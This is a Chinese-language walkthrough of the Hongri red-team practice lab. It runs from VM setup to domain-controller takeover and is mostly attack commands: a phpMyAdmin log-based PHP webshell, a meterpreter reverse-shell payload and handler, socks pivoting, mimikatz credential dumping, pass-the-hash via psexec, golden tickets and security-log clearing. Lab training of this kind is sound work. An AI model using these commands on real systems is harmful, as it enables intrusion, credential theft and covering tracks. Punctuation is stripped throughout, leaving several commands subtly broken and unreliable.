红日靶场-1实战指南：从零搭建到域控突破

1. 红日靶场环境搭建详解第一次接触红日靶场的朋友可能会被复杂的网络拓扑吓到其实只要跟着步骤走搭建过程比想象中简单得多。我刚开始玩的时候也踩过不少坑比如虚拟机网卡配置错误、防火墙忘记关闭这些低级错误。下面就把我反复测试验证过的搭建方法分享给大家。1.1 网络拓扑规划红日靶场需要模拟内外网隔离的环境这里采用VMware的VMnet1和VMnet8虚拟网络。关键点在于VMnet1作为内网使用192.168.52.0/24网段VMnet8作为外网使用192.168.20.0/24网段。为什么必须用这个IP段因为靶机Web服务的配置文件写死了内网IP改其他网段会导致服务无法启动。具体设备分配如下攻击机Windows11192.168.20.130Web服务器Win7双网卡192.168.20.132外网和192.168.52.143内网域控制器Win2008192.168.52.138域成员Win2003192.168.52.1411.2 虚拟机基础配置每台虚拟机的初始密码都是hongrisec2019建议先用快照功能保存初始状态。配置时最容易出错的是Win7的双网卡设置# 查看网卡配置是否正确 ipconfig /all # 测试外网连通性 ping 192.168.20.130 # 测试内网连通性 ping 192.168.52.138如果ping不通按这个顺序排查检查VMware虚拟网络编辑器中的网段设置确认虚拟机网卡模式为仅主机模式VMnet1和NAT模式VMnet8关闭所有机器的防火墙新手常忘netsh advfirewall set allprofiles state off1.3 Web服务部署Win7上使用phpStudy搭建Web环境这里有个细节要注意phpMyAdmin的版本是5.5.53这个版本存在日志写shell的漏洞后续渗透会用到。启动服务后访问http://192.168.20.132/phpinfo.php能看到探针页面说明环境就绪。2. 外网渗透突破口选择拿到靶场环境不要急着乱扫先做系统化的信息收集。我常用的四步法是端口扫描→服务识别→漏洞验证→突破路径选择。2.1 端口扫描与识别用nmap做全端口扫描能快速定位攻击面nmap -T4 -sV -p- -A 192.168.20.132扫描结果会显示开放了80Web、3306MySQL、445/139SMB端口。新手容易犯的错误是三个方向同时尝试建议按这个优先级Web应用phpMyAdminSMB共享可能泄露配置文件MySQL直接爆破最后选择2.2 phpMyAdmin漏洞利用访问phpMyAdmin后台时先用弱密码root/root尝试登录运气好的话能直接进入。这个版本的phpMyAdmin可以通过日志写shellset global general_logon; select basedir; set global general_log_fileC:/phpStudy/WWW/shell.php; select ?php eval($_POST[attack])?;成功后用蚁剑连接http://192.168.20.132/shell.php在虚拟终端执行ipconfig会发现内网网段192.168.52.0/24这就是我们下一步的攻击目标。3. 内网横向移动实战拿到Web服务器权限只是开始真正的挑战在内网渗透。我总结了一套可复用的内网渗透流程权限维持→信息收集→横向移动→域控突破。3.1 权限维持与代理搭建先用msfvenom生成木马维持访问msfvenom -p windows/meterpreter_reverse_tcp LHOST192.168.20.138 LPORT4444 -f exe -o shell.exe通过蚁剑上传并执行后在Kali上设置监听use exploit/multi/handler set payload windows/meterpreter_reverse_tcp set lhost 0.0.0.0 exploit关键步骤是进程迁移到稳定系统进程如explorer.exe否则会话容易中断。之后配置socks代理实现内网穿透run post/multi/manage/autoroute use auxiliary/server/socks_proxy set srvport 1080 set srvhost 127.0.0.1 run3.2 域内信息收集技巧在meterpreter会话中执行net view /domain net group domain controllers /domain arp -a通过这些命令可以确定域名god.org域控主机owa.god.org192.168.52.138域成员stu1.god.org、root-tvi862ubeh.god.org特别注意使用nmap扫描内网时要通过proxychains代理否则会漏掉主机proxychains nmap -Pn -sT 192.168.52.1384. 域控突破与权限维持域控是内网的皇冠拿到域控权限意味着控制整个域。红日靶场中可以通过哈希传递PTH和黄金票据两种方式实现。4.1 哈希传递攻击实战先用mimikatz抓取哈希需迁移到x86进程load kiwi creds_all获得NTLM哈希后使用psexec模块攻击域控use exploit/windows/smb/psexec set rhosts 192.168.52.138 set smbuser administrator set smbpass [哈希值] set smbdomain god run如果失败可以换Cobalt Strike的SMB Beacon操作更直观创建SMB监听器选择system权限的session使用pth功能注入哈希4.2 黄金票据制作拿到域控后需要制作黄金票据实现持久化golden_ticket_create -u Administrator -d god.org -s [SID] -k [krbtgt哈希] -t /root/golden.ticket使用票据后可以随时访问域内任何资源即使修改管理员密码也不受影响。最后别忘记清理日志wevtutil cl security wevtutil cl system wevtutil cl application红日靶场作为内网渗透的经典环境涵盖了从外网打到域控的全流程。我在复现过程中最大的体会是内网渗透就像拼图每个步骤环环相扣。建议新手在每个阶段都做好记录遇到问题时回溯前面的操作往往能找到突破口。